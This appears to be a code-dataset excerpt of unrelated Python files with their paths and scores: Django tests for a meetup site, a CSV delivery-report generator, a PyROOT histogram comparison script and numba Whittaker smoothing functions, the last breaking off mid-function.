with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.side_effect = Exception
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
class TestWSGIApp(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.app = webtest.TestApp(wsgi.application)
def test_admin_login(self):
"""Test that the admin login can be reached through the WSGI App.
This test is mostly to exercise the interface.
"""
response = self.app.get("/admin/login/")
self.assertEqual(response.status_int, 200) | pythonsd/tests/__init__.py | import json
import os
import unittest
from unittest import mock
from django import test
from django.conf import settings
from django.urls import reverse
import webtest
from config import wsgi
class TestBasicViews(test.TestCase):
def test_code_of_conduct(self):
response = self.client.get(reverse("code-of-conduct"))
self.assertContains(response, "<h1>Code of Conduct</h1>")
def test_coc_redirect(self):
"""The shortcuts '/coc' and '/coc/' paths should redirect to
the code of conduct page."""
response = self.client.get("/coc")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/code-of-conduct/")
response = self.client.get("/coc/")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/code-of-conduct/")
class TestHomepageMeetupEvents(test.TestCase):
def setUp(self):
fp = os.path.join(os.path.dirname(__file__), "data/meetup-events-api.json")
with open(fp) as fd:
self.api_response = json.load(fd)
self.expected_events = [
{
"link": "https://www.meetup.com/pythonsd/events/fdzbnqyznbqb/",
"name": "Saturday Study Group",
"datetime": "2019-10-12T12:00:00-07:00",
"venue": "UCSD Geisel Library",
},
{
"link": "https://www.meetup.com/pythonsd/events/fdzbnqyznbzb/",
"name": "Saturday Study Group",
"datetime": "2019-10-19T12:00:00-07:00",
"venue": "UCSD Geisel Library",
},
{
"link": "https://www.meetup.com/pythonsd/events/zgtnxqyznbgc/",
"name": "Monthly Meetup",
"datetime": "2019-10-24T19:00:00-07:00",
"venue": "Qualcomm Building Q",
},
]
@mock.patch("pythonsd.views.HomePageView.get_upcoming_events", return_value=[])
def test_no_events(self, mock_call):
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
def test_html_widget(self):
with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.return_value.ok = True
mock_get.return_value.json.return_value = self.api_response
response = self.client.get("/")
self.assertContains(response, "UCSD Geisel Library")
self.assertContains(response, "Qualcomm Building Q")
# Check that it is retreived from the cache
with mock.patch("pythonsd.views.requests.get") as mock_get:
# Return val shouldn't matter - will use cache
mock_get.return_value.ok = False
response = self.client.get("/")
self.assertContains(response, "UCSD Geisel Library")
def test_api_failure(self):
with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.return_value.ok = False
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.side_effect = Exception
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
class TestWSGIApp(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.app = webtest.TestApp(wsgi.application)
def test_admin_login(self):
"""Test that the admin login can be reached through the WSGI App.
This test is mostly to exercise the interface.
"""
response = self.app.get("/admin/login/")
self.assertEqual(response.status_int, 200) | 0.578091 | 0.305568 |
from service.models import RoutedNotification, Account
import os
from octopus.lib import clcsv
from copy import deepcopy
from datetime import datetime
from octopus.core import app
def delivery_report(from_date, to_date, reportfile):
"""
Generate the monthly report from from_date to to_date. It is assumed that from_date is
the start of a month, and to_date is the end of a month.
Dates must be strings of the form YYYY-MM-DDThh:mm:ssZ
:param from_date: start of month date from which to generate the report
:param to_date: end of month date up to which to generate the report (if this is not specified, it will default to datetime.utcnow())
:param reportfile: file path for existing/new report to be output
:return:
"""
# work out the whole months that we're operating over
frstamp = datetime.strptime(from_date, "%Y-%m-%dT%H:%M:%SZ")
if to_date is None:
tostamp = datetime.utcnow()
else:
tostamp = datetime.strptime(to_date, "%Y-%m-%dT%H:%M:%SZ")
months = range(frstamp.month, tostamp.month + 1)
# prep the data structures where we're going to record the results
result = {}
uniques = {}
for m in months:
uniques[m] = {"md" : 0, "content" : 0}
heis = {}
# go through each routed notification and count against the repository ids whether something is
# a md-only or a with-content notification, and at the same time count the unique md-only vs with-content
# notifications that were routed
q = DeliveryReportQuery(from_date, to_date)
for note in RoutedNotification.scroll(q.query(), page_size=100, keepalive="5m"):
assert isinstance(note, RoutedNotification)
nm = note.analysis_datestamp.month
is_with_content = False
if len(note.links) > 0:
is_with_content = True
uniques[nm]["content"] += 1
else:
uniques[nm]["md"] += 1
for r in note.repositories:
if r not in result:
result[r] = {}
for m in months:
result[r][m] = {"md" : 0, "content" : 0}
if is_with_content:
result[r][nm]["content"] += 1
else:
result[r][nm]["md"] += 1
# now flesh out the report with account names and totals
for k in result.keys():
acc = Account.pull(k)
if acc is None:
heis[k] = k
else:
if acc.repository_name is not None:
heis[k] = acc.repository_name
else:
heis[k] = k
for mon in result[k].keys():
result[k][mon]["total"] = result[k][mon]["md"] + result[k][mon]["content"]
for mon in uniques.keys():
uniques[mon]["total"] = uniques[mon]["md"] + uniques[mon]["content"]
# some constant bits of information we're going to need to convert the results into a table
# suitable for a CSV
month_names = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']
headers = ['HEI','ID',
'Jan md-only', "Jan with-content", "Jan Total",
'Feb md-only', "Feb with-content", "Feb Total",
'Mar md-only', "Mar with-content", "Mar Total",
'Apr md-only', "Apr with-content", "Apr Total",
'May md-only', "May with-content", "May Total",
'Jun md-only', "Jun with-content", "Jun Total",
'Jul md-only', "Jul with-content", "Jul Total",
'Aug md-only', "Aug with-content", "Aug Total",
'Sep md-only', "Sep with-content", "Sep Total",
'Oct md-only', "Oct with-content", "Oct Total",
'Nov md-only', "Nov with-content", "Nov Total",
'Dec md-only', "Dec with-content", "Dec Total"]
template = {}
for k in headers:
template[k] = 0
# an interim data-structure that we'll use to store the objects to be written, which we
# can then order by the key (which will be the HEI name)
data = {}
# read any existing data in from the current spreadsheet
if os.path.exists(reportfile):
sofar = clcsv.ClCsv(file_path=reportfile)
for obj in sofar.objects():
# convert all the fields to integers as needed
for k in obj.keys():
if k not in ["HEI", "ID"]:
if obj[k] == "":
obj[k] = 0
else:
try:
obj[k] = int(obj[k])
except:
app.logger.warn(u"Unable to coerce existing report value '{x}' to an integer, so assuming it is 0".format(x=obj[k]))
obj[k] = 0
data[obj.get("HEI")] = obj
# now add any new data from the report
for id, res in result.iteritems():
hei = heis.get(id)
if hei not in data:
data[hei] = deepcopy(template)
data[hei]["HEI"] = hei
data[hei]["ID"] = id
for mon, info in res.iteritems():
mn = month_names[mon - 1]
mdk = mn + " md-only"
ctk = mn + " with-content"
tk = mn + " Total"
data[hei][mdk] = info.get("md")
data[hei][ctk] = info.get("content")
data[hei][tk] = info.get("total")
# remove the "total" and "unique" entries, as we need to re-create them
if "Total" in data:
del data["Total"]
existing_unique = deepcopy(template)
existing_unique["HEI"] = "Unique"
existing_unique["ID"] = ""
if "Unique" in data:
existing_unique = data["Unique"]
del data["Unique"]
# calculate the totals for all columns
totals = {}
for k in headers:
totals[k] = 0
totals["HEI"] = "Total"
totals["ID"] = ""
for hei, obj in data.iteritems():
for k, v in obj.iteritems():
if k in ["HEI", "ID"]:
continue
if isinstance(v, int):
totals[k] += v
data["Total"] = totals
# add the uniques
data["Unique"] = existing_unique
data["Unique"]["HEI"] = "Unique"
for mon, info in uniques.iteritems():
mn = month_names[mon - 1]
mdk = mn + " md-only"
ctk = mn + " with-content"
tk = mn + " Total"
data["Unique"][mdk] = info.get("md")
data["Unique"][ctk] = info.get("content")
data["Unique"][tk] = info.get("total")
orderedkeys = data.keys()
orderedkeys.remove('Unique')
orderedkeys.remove('Total')
orderedkeys.sort()
orderedkeys.append('Total')
orderedkeys.append('Unique')
# remove the old report file, so we can start with a fresh new one
try:
os.remove(reportfile)
except:
pass
out = clcsv.ClCsv(file_path=reportfile)
out.set_headers(headers)
for hk in orderedkeys:
hei = data[hk]
out.add_object(hei)
out.save()
class DeliveryReportQuery(object):
def __init__(self, from_date, to_date):
self.from_date = from_date
self.to_date = to_date
def query(self):
return {
"query" : {
"bool" : {
"must" : [
{
"range" : {
"analysis_date" : {
"gte" : self.from_date,
"lt" : self.to_date
}
}
}
]
}
},
"sort" : [
{"analysis_date" : {"order" : "asc"}}
]
} | service/reports.py | from service.models import RoutedNotification, Account
import os
from octopus.lib import clcsv
from copy import deepcopy
from datetime import datetime
from octopus.core import app
def delivery_report(from_date, to_date, reportfile):
"""
Generate the monthly report from from_date to to_date. It is assumed that from_date is
the start of a month, and to_date is the end of a month.
Dates must be strings of the form YYYY-MM-DDThh:mm:ssZ
:param from_date: start of month date from which to generate the report
:param to_date: end of month date up to which to generate the report (if this is not specified, it will default to datetime.utcnow())
:param reportfile: file path for existing/new report to be output
:return:
"""
# work out the whole months that we're operating over
frstamp = datetime.strptime(from_date, "%Y-%m-%dT%H:%M:%SZ")
if to_date is None:
tostamp = datetime.utcnow()
else:
tostamp = datetime.strptime(to_date, "%Y-%m-%dT%H:%M:%SZ")
months = range(frstamp.month, tostamp.month + 1)
# prep the data structures where we're going to record the results
result = {}
uniques = {}
for m in months:
uniques[m] = {"md" : 0, "content" : 0}
heis = {}
# go through each routed notification and count against the repository ids whether something is
# a md-only or a with-content notification, and at the same time count the unique md-only vs with-content
# notifications that were routed
q = DeliveryReportQuery(from_date, to_date)
for note in RoutedNotification.scroll(q.query(), page_size=100, keepalive="5m"):
assert isinstance(note, RoutedNotification)
nm = note.analysis_datestamp.month
is_with_content = False
if len(note.links) > 0:
is_with_content = True
uniques[nm]["content"] += 1
else:
uniques[nm]["md"] += 1
for r in note.repositories:
if r not in result:
result[r] = {}
for m in months:
result[r][m] = {"md" : 0, "content" : 0}
if is_with_content:
result[r][nm]["content"] += 1
else:
result[r][nm]["md"] += 1
# now flesh out the report with account names and totals
for k in result.keys():
acc = Account.pull(k)
if acc is None:
heis[k] = k
else:
if acc.repository_name is not None:
heis[k] = acc.repository_name
else:
heis[k] = k
for mon in result[k].keys():
result[k][mon]["total"] = result[k][mon]["md"] + result[k][mon]["content"]
for mon in uniques.keys():
uniques[mon]["total"] = uniques[mon]["md"] + uniques[mon]["content"]
# some constant bits of information we're going to need to convert the results into a table
# suitable for a CSV
month_names = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']
headers = ['HEI','ID',
'Jan md-only', "Jan with-content", "Jan Total",
'Feb md-only', "Feb with-content", "Feb Total",
'Mar md-only', "Mar with-content", "Mar Total",
'Apr md-only', "Apr with-content", "Apr Total",
'May md-only', "May with-content", "May Total",
'Jun md-only', "Jun with-content", "Jun Total",
'Jul md-only', "Jul with-content", "Jul Total",
'Aug md-only', "Aug with-content", "Aug Total",
'Sep md-only', "Sep with-content", "Sep Total",
'Oct md-only', "Oct with-content", "Oct Total",
'Nov md-only', "Nov with-content", "Nov Total",
'Dec md-only', "Dec with-content", "Dec Total"]
template = {}
for k in headers:
template[k] = 0
# an interim data-structure that we'll use to store the objects to be written, which we
# can then order by the key (which will be the HEI name)
data = {}
# read any existing data in from the current spreadsheet
if os.path.exists(reportfile):
sofar = clcsv.ClCsv(file_path=reportfile)
for obj in sofar.objects():
# convert all the fields to integers as needed
for k in obj.keys():
if k not in ["HEI", "ID"]:
if obj[k] == "":
obj[k] = 0
else:
try:
obj[k] = int(obj[k])
except:
app.logger.warn(u"Unable to coerce existing report value '{x}' to an integer, so assuming it is 0".format(x=obj[k]))
obj[k] = 0
data[obj.get("HEI")] = obj
# now add any new data from the report
for id, res in result.iteritems():
hei = heis.get(id)
if hei not in data:
data[hei] = deepcopy(template)
data[hei]["HEI"] = hei
data[hei]["ID"] = id
for mon, info in res.iteritems():
mn = month_names[mon - 1]
mdk = mn + " md-only"
ctk = mn + " with-content"
tk = mn + " Total"
data[hei][mdk] = info.get("md")
data[hei][ctk] = info.get("content")
data[hei][tk] = info.get("total")
# remove the "total" and "unique" entries, as we need to re-create them
if "Total" in data:
del data["Total"]
existing_unique = deepcopy(template)
existing_unique["HEI"] = "Unique"
existing_unique["ID"] = ""
if "Unique" in data:
existing_unique = data["Unique"]
del data["Unique"]
# calculate the totals for all columns
totals = {}
for k in headers:
totals[k] = 0
totals["HEI"] = "Total"
totals["ID"] = ""
for hei, obj in data.iteritems():
for k, v in obj.iteritems():
if k in ["HEI", "ID"]:
continue
if isinstance(v, int):
totals[k] += v
data["Total"] = totals
# add the uniques
data["Unique"] = existing_unique
data["Unique"]["HEI"] = "Unique"
for mon, info in uniques.iteritems():
mn = month_names[mon - 1]
mdk = mn + " md-only"
ctk = mn + " with-content"
tk = mn + " Total"
data["Unique"][mdk] = info.get("md")
data["Unique"][ctk] = info.get("content")
data["Unique"][tk] = info.get("total")
orderedkeys = data.keys()
orderedkeys.remove('Unique')
orderedkeys.remove('Total')
orderedkeys.sort()
orderedkeys.append('Total')
orderedkeys.append('Unique')
# remove the old report file, so we can start with a fresh new one
try:
os.remove(reportfile)
except:
pass
out = clcsv.ClCsv(file_path=reportfile)
out.set_headers(headers)
for hk in orderedkeys:
hei = data[hk]
out.add_object(hei)
out.save()
class DeliveryReportQuery(object):
def __init__(self, from_date, to_date):
self.from_date = from_date
self.to_date = to_date
def query(self):
return {
"query" : {
"bool" : {
"must" : [
{
"range" : {
"analysis_date" : {
"gte" : self.from_date,
"lt" : self.to_date
}
}
}
]
}
},
"sort" : [
{"analysis_date" : {"order" : "asc"}}
]
} | 0.353651 | 0.364947 |
from ROOT import *
gROOT.SetBatch()
gROOT.LoadMacro( "AtlasStyle.C" )
gROOT.LoadMacro( "AtlasLabels.C" )
SetAtlasStyle()
#====================================================
# FUNCTION TO MAKE CANVAS
#====================================================
def MakeCanvas( split = 0.25 ):
c = TCanvas( "DataPrediction", "Data/Prediction", 800, 800 )
pad0 = TPad("pad0","pad0", 0.0, 0.273, 1.0, 1.00)
pad1 = TPad("pad1","pad1", 0.0, 0.008, 1.0, 0.272)
pad0.SetBottomMargin(0.001)
pad0.SetBorderMode(0)
pad1.SetBottomMargin(0.45)
pad0.SetTicks(1,1)
pad1.SetTicks(1,1)
pad0.Draw()
pad1.Draw()
pad0.cd()
return c, pad0, pad1
def main():
#====================================================
# PREPARING THE DATA
#====================================================
#Taking the .root file.
f = TFile ("rootfile_name.root")
#Extracting the histograms from the .root file.
variables = [ "d0significance", "z0sintheta" ]
titles = [ "d_0", "z_0 sin #theta" ]
leptons = [ "", "_e", "_mu" ]
#Creating the Canvas.
c, pad0, pad1 = MakeCanvas()
pad0.SetLogy()
#====================================================
# SAVING HISTOGRAMS
#====================================================
f_out = TFile ("comparison_histograms.root", "recreate")
ratios = []
for variable in variables:
if variable == "d0significance":
title = "d_{0}"
else:
title = "z_{0} sin #theta"
for lepton in leptons:
hname_tau = "h_tau_" + variable + lepton
hname_W = "h_W_" + variable + lepton
h_tau = f.Get( hname_tau )
h_tau.Rebin(4)
h_tau.Scale( 1. / h_tau.Integral() )
h_tau.SetLineColor( kRed )
h_tau.SetMarkerColor( kRed )
h_tau.SetTitle( "leptons from #tau " )
h_tau.GetXaxis().SetTitle( title )
h_tau.GetXaxis().SetTitleSize(.15)
h_tau.GetYaxis().SetTitle( "Events" )
h_tau.GetYaxis().SetLabelSize(.040)
h_W = f.Get( hname_W )
h_W.Rebin(4)
h_W.Scale( 1. / h_W.Integral() )
h_W.GetXaxis().SetTitle( title )
h_W.GetYaxis().SetTitle( "Events" )
h_W.SetTitle( "leptons from W" )
h_W.GetYaxis().SetLabelSize(.040)
h_ratio = h_tau.Clone()
h_ratio.GetYaxis().SetTitle( "#tau / W" )
h_ratio.GetYaxis().SetTitleSize(.15)
h_ratio.GetYaxis().SetTitleOffset(.48)
h_ratio.GetYaxis().SetLabelSize(.1)
h_ratio.GetYaxis().SetLabelOffset(.03)
h_ratio.GetYaxis().SetNdivisions(5)
h_ratio.GetXaxis().SetLabelSize(.10)
h_ratio.GetXaxis().SetLabelOffset(.07)
h_ratio.Divide( h_W )
h_ratio.SetDirectory( f_out )
pad0.cd()
h_W.Draw( "hist" )
h_tau.Draw( "hist same" )
#TLegend settings:
leg = TLegend(0.17,0.7,0.48,0.9)
leg.SetFillColor(0)
leg.SetFillStyle(0)
leg.SetLineColor(0)
leg.SetBorderSize(0)
leg.SetTextFont(42)
leg.SetTextSize(0.04)
leg.AddEntry(h_W,"Leptons from W")
leg.AddEntry(h_tau,"Leptons from #tau")
leg.Draw()
ATLASLabel( 0.65, 0.8, "Internal" )
pad1.cd()
h_ratio.Draw( "" )
ratios.append( h_ratio )
c.Print( variable + lepton + ".pdf" )
c.Print( variable + lepton + ".root" )
f_out.Write()
f_out.Close()
if __name__ == "__main__":
main() | scripts/python/data analysis/impact parameters/compare_plots.py | from ROOT import *
gROOT.SetBatch()
gROOT.LoadMacro( "AtlasStyle.C" )
gROOT.LoadMacro( "AtlasLabels.C" )
SetAtlasStyle()
#====================================================
# FUNCTION TO MAKE CANVAS
#====================================================
def MakeCanvas( split = 0.25 ):
c = TCanvas( "DataPrediction", "Data/Prediction", 800, 800 )
pad0 = TPad("pad0","pad0", 0.0, 0.273, 1.0, 1.00)
pad1 = TPad("pad1","pad1", 0.0, 0.008, 1.0, 0.272)
pad0.SetBottomMargin(0.001)
pad0.SetBorderMode(0)
pad1.SetBottomMargin(0.45)
pad0.SetTicks(1,1)
pad1.SetTicks(1,1)
pad0.Draw()
pad1.Draw()
pad0.cd()
return c, pad0, pad1
def main():
#====================================================
# PREPARING THE DATA
#====================================================
#Taking the .root file.
f = TFile ("rootfile_name.root")
#Extracting the histograms from the .root file.
variables = [ "d0significance", "z0sintheta" ]
titles = [ "d_0", "z_0 sin #theta" ]
leptons = [ "", "_e", "_mu" ]
#Creating the Canvas.
c, pad0, pad1 = MakeCanvas()
pad0.SetLogy()
#====================================================
# SAVING HISTOGRAMS
#====================================================
f_out = TFile ("comparison_histograms.root", "recreate")
ratios = []
for variable in variables:
if variable == "d0significance":
title = "d_{0}"
else:
title = "z_{0} sin #theta"
for lepton in leptons:
hname_tau = "h_tau_" + variable + lepton
hname_W = "h_W_" + variable + lepton
h_tau = f.Get( hname_tau )
h_tau.Rebin(4)
h_tau.Scale( 1. / h_tau.Integral() )
h_tau.SetLineColor( kRed )
h_tau.SetMarkerColor( kRed )
h_tau.SetTitle( "leptons from #tau " )
h_tau.GetXaxis().SetTitle( title )
h_tau.GetXaxis().SetTitleSize(.15)
h_tau.GetYaxis().SetTitle( "Events" )
h_tau.GetYaxis().SetLabelSize(.040)
h_W = f.Get( hname_W )
h_W.Rebin(4)
h_W.Scale( 1. / h_W.Integral() )
h_W.GetXaxis().SetTitle( title )
h_W.GetYaxis().SetTitle( "Events" )
h_W.SetTitle( "leptons from W" )
h_W.GetYaxis().SetLabelSize(.040)
h_ratio = h_tau.Clone()
h_ratio.GetYaxis().SetTitle( "#tau / W" )
h_ratio.GetYaxis().SetTitleSize(.15)
h_ratio.GetYaxis().SetTitleOffset(.48)
h_ratio.GetYaxis().SetLabelSize(.1)
h_ratio.GetYaxis().SetLabelOffset(.03)
h_ratio.GetYaxis().SetNdivisions(5)
h_ratio.GetXaxis().SetLabelSize(.10)
h_ratio.GetXaxis().SetLabelOffset(.07)
h_ratio.Divide( h_W )
h_ratio.SetDirectory( f_out )
pad0.cd()
h_W.Draw( "hist" )
h_tau.Draw( "hist same" )
#TLegend settings:
leg = TLegend(0.17,0.7,0.48,0.9)
leg.SetFillColor(0)
leg.SetFillStyle(0)
leg.SetLineColor(0)
leg.SetBorderSize(0)
leg.SetTextFont(42)
leg.SetTextSize(0.04)
leg.AddEntry(h_W,"Leptons from W")
leg.AddEntry(h_tau,"Leptons from #tau")
leg.Draw()
ATLASLabel( 0.65, 0.8, "Internal" )
pad1.cd()
h_ratio.Draw( "" )
ratios.append( h_ratio )
c.Print( variable + lepton + ".pdf" )
c.Print( variable + lepton + ".root" )
f_out.Write()
f_out.Close()
if __name__ == "__main__":
main() | 0.413359 | 0.160496 |
# pyright: reportGeneralTypeIssues=false
# pylint: disable=C0103,C0301,E0401,R0912,R0913,R0914,R0915
from math import log, pow, sqrt # pylint: disable=W0622
from typing import Union
import numpy
import xarray
from numba import guvectorize, njit
from numba.core.types import float64, int16, int32, uint8
@njit
def ws2d(y, lmda, w):
    """
    Whittaker filter with differences of 2nd order.

    Solves the penalized weighted least-squares system
    (W + lmda * D'D) z = W y, where D is the 2nd-order difference
    matrix, using a banded (pentadiagonal) forward elimination
    followed by back-substitution. The coefficient patterns
    (1, 5, 6, ..., 5, 1 on the diagonal; -2/-4 lambda off-diagonal)
    are the boundary-adjusted rows of lmda * D'D.

    Args:
        y (numpy.array): raw data array (1d, expected in float64)
        lmda (double): S value
        w (numpy.array): weights vector (1d, expected in float64);
            0 marks missing observations, 1 valid ones
    Returns:
        z (numpy.array): smoothed data array (1d)
    """
    n = y.shape[0]
    m = n - 1
    z = numpy.zeros(n)
    # Banded factorization workspace: d = pivots (diagonal),
    # c = first off-diagonal, e = second off-diagonal.
    d = z.copy()
    c = z.copy()
    e = z.copy()
    # First two rows have special (boundary) coefficients.
    d[0] = w[0] + lmda
    c[0] = (-2 * lmda) / d[0]
    e[0] = lmda / d[0]
    z[0] = w[0] * y[0]
    d[1] = w[1] + 5 * lmda - d[0] * (c[0] * c[0])
    c[1] = (-4 * lmda - d[0] * c[0] * e[0]) / d[1]
    e[1] = lmda / d[1]
    z[1] = w[1] * y[1] - c[0] * z[0]
    # Forward sweep over the interior rows; z accumulates the
    # transformed right-hand side as elimination proceeds.
    for i in range(2, m - 1):
        i1 = i - 1
        i2 = i - 2
        d[i] = w[i] + 6 * lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
        c[i] = (-4 * lmda - d[i1] * c[i1] * e[i1]) / d[i]
        e[i] = lmda / d[i]
        z[i] = w[i] * y[i] - c[i1] * z[i1] - e[i2] * z[i2]
    # Last two rows again carry boundary coefficients.
    # NOTE(review): for n < 4 the indices m - 2 / m - 3 go negative and
    # wrap around via Python negative indexing; callers only guard
    # n > 1 — confirm such short series cannot reach this function.
    i1 = m - 2
    i2 = m - 3
    d[m - 1] = w[m - 1] + 5 * lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
    c[m - 1] = (-2 * lmda - d[i1] * c[i1] * e[i1]) / d[m - 1]
    z[m - 1] = w[m - 1] * y[m - 1] - c[i1] * z[i1] - e[i2] * z[i2]
    i1 = m - 1
    i2 = m - 2
    d[m] = w[m] + lmda - (c[i1] * c[i1]) * d[i1] - (e[i2] * e[i2]) * d[i2]
    z[m] = (w[m] * y[m] - c[i1] * z[i1] - e[i2] * z[i2]) / d[m]
    # Back-substitution from the last element towards the first.
    z[m - 1] = z[m - 1] / d[m - 1] - c[m - 1] * z[m]
    for i in range(m - 2, -1, -1):
        z[i] = z[i] / d[i] - c[i] * z[i + 1] - e[i] * z[i + 2]
    return z
@guvectorize(
    [(float64[:], float64, float64, int16[:])], "(n),(),() -> (n)", nopython=True
)
def ws2dgu(y, lmda, nodata, out):
    """
    Whittaker smoother with fixed smoothing parameter (S).

    Builds a 0/1 weight vector from *nodata* markers, smooths with
    :func:`ws2d`, and writes the rounded result into ``out``. When
    fewer than two valid observations exist, the raw series is
    copied through unchanged.

    Args:
        y: time-series numpy array (float64)
        lmda: smoothing parameter lambda (S)
        nodata: value marking missing observations in y
        out: int16 output array receiving the rounded smoothed series
    """
    size = y.shape[0]
    w = numpy.zeros(y.shape, dtype=float64)
    valid = 0
    # Weight valid observations with 1; nodata entries keep weight 0.
    for idx in range(size):
        if y[idx] != nodata:
            w[idx] = 1
            valid += 1
    if valid > 1:
        smoothed = ws2d(y, lmda, w)
        numpy.round_(smoothed, 0, out)
    else:
        # Not enough data points to smooth — pass through.
        out[:] = y[:]
@guvectorize(
    [(float64[:], float64, float64, float64, int16[:])],
    "(n),(),(),() -> (n)",
    nopython=True,
)
def ws2dpgu(y, lmda, nodata, p, out):
    """
    Whittaker smoother with asymmetric weights and fixed lambda (S).

    Iteratively reweights the series so points above the current fit
    get weight ``p`` and points on/below it get ``1 - p`` (upper
    "envelope" behaviour for p > 0.5), re-smoothing with :func:`ws2d`
    until the fit stops changing or 10 passes have run. The rounded
    final fit is written into ``out``; with fewer than two valid
    observations the raw series is copied through unchanged.

    Args:
        y: time-series numpy array (float64)
        lmda: smoothing parameter lambda (S)
        nodata: value marking missing observations in y
        p: "Envelope" value for the asymmetric weights
        out: int16 output array receiving the rounded smoothed series
    """
    size = y.shape[0]
    w = numpy.zeros(y.shape, dtype=float64)
    valid = 0
    # Base weights: 1 for valid observations, 0 for nodata.
    for idx in range(size):
        if y[idx] != nodata:
            w[idx] = 1
            valid += 1
    if valid > 1:
        p_low = 1 - p
        fit = numpy.zeros(size)
        fit_next = numpy.zeros(size)
        asym = numpy.zeros(size)
        ww = numpy.zeros(size)
        # Asymmetric reweighting loop (at most 10 iterations).
        # The first pass compares y against an all-zero fit.
        for _ in range(10):
            for idx in range(size):
                if y[idx] > fit[idx]:
                    asym[idx] = p
                else:
                    asym[idx] = p_low
                ww[idx] = w[idx] * asym[idx]
            fit_next[:] = ws2d(y, lmda, ww)
            # L1 change between successive fits; zero means converged.
            delta = 0.0
            for idx in range(size):
                delta += abs(fit_next[idx] - fit[idx])
            if delta == 0.0:
                break
            fit[:] = fit_next[:]
        # Final smooth with the last weight vector (matches original flow).
        fit = ws2d(y, lmda, ww)
        numpy.round_(fit, 0, out)
    else:
        # Not enough data points to smooth — pass through.
        out[:] = y[:]
@guvectorize(
    [(float64[:], float64, float64[:], int16[:], float64[:])],
    "(n),(),(m) -> (n),()",
    nopython=True,
)
def ws2doptv(y, nodata, llas, out, lopt):
    """
    Whittaker filter V-curve optimization of S.

    For every candidate log10(S) value in ``llas``, smooths the series
    and records log fit residual vs. log roughness penalty; the S at
    the minimum of the resulting V-curve is selected, the series is
    smoothed once more with it, and the rounded result written to
    ``out``. The chosen S is written to ``lopt[0]`` (0.0 if fewer
    than two valid observations).

    Args:
        y (numpy.array): raw data array (1d, expected in float64)
        nodata (double, int): nodata value
        llas (numpy.array): 1d array of s values to use for optimization
            (log10 scale, assumed evenly spaced)
        out (numpy.array): int16 output array for the smoothed series
        lopt (numpy.array): length-1 array receiving the optimized S
    """
    m = y.shape[0]
    w = numpy.zeros(y.shape, dtype=float64)
    n = 0
    # Build 0/1 weights from the nodata marker; n counts valid points.
    for ii in range(m):
        if y[ii] == nodata:
            w[ii] = 0
        else:
            n += 1
            w[ii] = 1
    if n > 1:
        m1 = m - 1
        m2 = m - 2
        nl = len(llas)
        nl1 = nl - 1
        i = 0
        k = 0
        fits = numpy.zeros(nl)   # log weighted residual sum per candidate
        pens = numpy.zeros(nl)   # log 2nd-difference penalty per candidate
        z = numpy.zeros(m)
        diff1 = numpy.zeros(m1)  # scratch: 1st differences of the fit
        lamids = numpy.zeros(nl1)
        v = numpy.zeros(nl1)
        # Compute v-curve
        for lix in range(nl):
            # Candidates are log10 values; recover the actual S.
            lmda = pow(10, llas[lix])
            z[:] = ws2d(y, lmda, w)
            # Weighted sum of squared residuals (log scale).
            for i in range(m):
                w_tmp = w[i]
                y_tmp = y[i]
                z_tmp = z[i]
                fits[lix] += pow(w_tmp * (y_tmp - z_tmp), 2)
            fits[lix] = log(fits[lix])
            # Roughness: sum of squared 2nd differences (log scale).
            for i in range(m1):
                z_tmp = z[i]
                z2 = z[i + 1]
                diff1[i] = z2 - z_tmp
            for i in range(m2):
                z_tmp = diff1[i]
                z2 = diff1[i + 1]
                pens[lix] += pow(z2 - z_tmp, 2)
            pens[lix] = log(pens[lix])
        # Construct v-curve
        llastep = llas[1] - llas[0]
        # Segment length in (fit, penalty) space per unit lambda,
        # evaluated at the midpoint of each candidate interval.
        for i in range(nl1):
            l1 = llas[i]
            l2 = llas[i + 1]
            f1 = fits[i]
            f2 = fits[i + 1]
            p1 = pens[i]
            p2 = pens[i + 1]
            v[i] = sqrt(pow(f2 - f1, 2) + pow(p2 - p1, 2)) / (log(10) * llastep)
            lamids[i] = (l1 + l2) / 2
        # Locate the V-curve minimum (linear scan, first minimum wins ties).
        vmin = v[k]
        for i in range(1, nl1):
            if v[i] < vmin:
                vmin = v[i]
                k = i
        lopt[0] = pow(10, lamids[k])
        # Final smooth with the optimized S.
        z = ws2d(y, lopt[0], w)
        numpy.round_(z, 0, out)
    else:
        # Not enough data points to smooth — pass through, flag S as 0.
        out[:] = y[:]
        lopt[0] = 0.0
@guvectorize(
    [(float64[:], float64, float64, float64[:], int16[:], float64[:])],
    "(n),(),(),(m) -> (n),()",
    nopython=True,
)
def ws2doptvp(y, nodata, p, llas, out, lopt):
    """
    Whittaker filter V-curve optimization of S and asymmetric weights.

    For each candidate log10(S) in ``llas``, runs the asymmetric
    reweighting loop (points above the fit weighted ``p``, others
    ``1 - p``, up to 10 passes) and records log fit vs. log penalty;
    the S at the V-curve minimum is selected, the asymmetric smooth is
    repeated with it, and the rounded result written to ``out``. The
    chosen S is written to ``lopt[0]`` (0.0 if fewer than two valid
    observations).

    Args:
        y (numpy.array): raw data array (1d, expected in float64)
        nodata (double, int): nodata value
        p (float): Envelope value for asymmetric weights
        llas (numpy.array): 1d array of s values to use for optimization
            (log10 scale, assumed evenly spaced)
        out (numpy.array): int16 output array for the smoothed series
        lopt (numpy.array): length-1 array receiving the optimized S
    """
    m = y.shape[0]
    w = numpy.zeros(y.shape, dtype=float64)
    n = 0
    # Build 0/1 weights from the nodata marker; n counts valid points.
    for ii in range(m):
        if y[ii] == nodata:
            w[ii] = 0
        else:
            n += 1
            w[ii] = 1
    if n > 1:
        m1 = m - 1
        m2 = m - 2
        nl = len(llas)
        nl1 = nl - 1
        i = 0
        k = 0
        j = 0
